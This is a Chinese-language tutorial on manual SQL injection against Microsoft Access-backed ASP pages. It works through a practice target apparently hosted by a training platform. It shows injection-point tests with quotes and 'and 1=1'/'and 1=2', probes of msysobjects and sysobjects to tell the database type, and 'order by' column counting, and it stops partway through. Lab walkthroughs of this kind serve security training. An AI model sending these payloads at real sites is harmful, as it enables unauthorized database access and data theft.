文章目录
Access数据库
正式名称
Microsoft_Access
是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具
手工注入
1.判断注入点
这里采用墨者学院提供的SQL手工注入漏洞测试环境
http://219.153.49.228:47744/new_list.asp?id=1
判断注入点标准三连 ’ ~ and 1=1 ~ and 1=2
http://219.153.49.228:47744/new_list.asp?id=1' #页面报错
http://219.153.49.228:47744/new_list.asp?id=1 and 1=1 #页面正常
http://219.153.49.228:47744/new_list.asp?id=1 and 1=2 #页面报错
说明:输入数据代入了数据库查询,且执行并返回了结果
–判断数据库类型小技巧 ******
#若带入 and (select count(*) from msysobjects)>0
#由于msysobjects表在access数据库中无权访问所以返回错误--为access数据库
http://219.153.49.228:43394/new_list.asp?id=1 and (select count(*) from msysobjects)>0 #错误是因为没有权限
#若带入and (select count(*) from sysobjects)>0
#由于sysobjects表在MSSQL数据库中可以正常访问所以当返回正常页面时表示为MSSQL数据库
http://219.153.49.228:43394/new_list.asp?id=1 and (select count(*) from sysobjects)>0 #错误表示不是mssql
2.判断存在的字段数
order by 语句用来根据指定的列对结果集进行排序
order by 1”表示对第一栏位进行排序,
作用:可以用来判断查询语句所在的表到底有多少个字段。
http://219.153.49.228:43394/new_list.asp?id=1 order by 1 #按第一列进行排序正常,说明至少有一个列